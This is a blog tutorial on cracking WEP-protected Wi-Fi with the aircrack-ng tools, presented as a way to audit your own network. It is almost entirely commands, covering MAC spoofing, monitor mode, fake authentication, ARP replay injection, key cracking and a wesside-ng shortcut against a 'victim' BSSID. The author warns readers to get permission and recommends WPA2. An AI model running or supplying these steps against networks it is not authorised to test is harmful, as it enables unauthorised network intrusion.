WEP Wireless Network Auditing

There would be times that you need to test your Wireless Network Security, and what would be a better way than hacking it yourself.

I’m not going to explain how it works, protocols, commands explanations, etc; I’m going to focus directly in the procedure of achieving what we need; in this case: Hacking our Wireless Network.

It’s up to the reader to investigate further in that matter; of course, if the reader has the curiosity that drives him to make such deep investigation. Either way, most of the readers just want a quick and less explanative way of doing things.

Before we start, the procedure I’m going to show you should be used against your own network, if you want to try it in another network that does not belong to you then you should ask for permission first; in some countries hacking wireless networks is illegal, so be wise!

By the way, you should avoid using WEP, instead use another type of security like WPA2.

  • The Hardware:

I’m going to use an integrated Atheros wireless card that comes with the notebook. If you have another card, be sure to check if it supports injection. If you want to know if your wireless card its compatible, check the following site: Tutorial: Is My Wireless Card Compatible?

  • The Software:

For taste purposes I’m going to use Backtrack 3 as my Linux Security distribution; you can use whatever you like or feel comfortable with it, just make sure you have the needed auditing tools.

Well, let’s get started…

I’m assuming you already have Backtrack totally booted and you’re looking right now at your desktop (the graphical interface).

First let’s put our wifi card in Monitor Mode with a faked MAC Address, so open a new terminal window and type the following in sequence:

# airmon-ng stop ath0
# ifconfig wifi0 down
# macchanger --mac 00:11:22:33:44:55 wifi0
# export WIFI=00:11:22:33:44:55

Note: You can also skip changing the Mac Address of your wifi card and just retrieve it with the following command:

# macchanger -s ath1

Execute twice airmon-ng start wifi0 to create 2 virtual interfaces (ath1 for monitoring and ath0 for infrastructure mode)

# airmon-ng start wifi0
# airmon-ng start wifi0

Before we continue, I’ll show you two ways of achieving the same result. The first one is the long way (more typing), and the second one it’s the short way (less typing).

I’m going to show you the long way first, but you’re free to skip to the short way section.

Long Way [more typing]:

Start airodump-ng to find our network details

# airodump-ng ath1

Copy or remember the BSSID and Channel; here I’m going to export the BSSID so I don’t need to remember it.

# export AP=00:12:A9:0C:F8:45

Now that we know the network details, launch again airodump-ng to start capturing packets. The 11 in the following command stands for the channel. Do you remember the network channel?

# airodump-ng -c 11 -w output --bssid $AP ath1

Open a new terminal window without closing the other one and export again our wifi card and network details so we don’t need to type those MAC Address again and again.

# export WIFI=00:11:22:33:44:55
# export AP=00:12:A9:0C:F8:45

Type the following to do a fake authentication

# aireplay-ng -1 0 -a $AP -h $WIFI ath1

Wait until it says: Association successful 🙂

If the fake authentication doesn’t work, then try:

# aireplay-ng -1 6000 -o 1 -q 10 -a $AP -h $WIFI ath1

Start aireplay-ng in ARP request replay mode:

# aireplay-ng -3 -b $AP -h $WIFI ath1

In the first terminal window you’ll see the #Data column growing up, if it isn’t, you should try to get more closer to the AP (Access Point, Router, …).

Wait until you get enough packets (#Data), like 5000 or more.

Finally, open a new terminal window leaving the others opened too, and type the last command to crack the generated captured file; I’m using 64 as the encryption bit, it could vary depending on the configuration of the AP.

# aircrack-ng -n 64 --bssid $AP output*.cap

If everything its okay you should see something like this:

If it says that you need more packets, then wait until you reach another 5000 or 10000 more and try again the last command.

Short Way [less typing]:

Start wesside-ng with the victims bssid and wait until the job is complete!

# wesside-ng -i ath0 -v 00:12:A9:0C:F8:45

And that’s all (I said it was less typing).

I hope you enjoyed reading this article as I enjoyed writing it.


Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s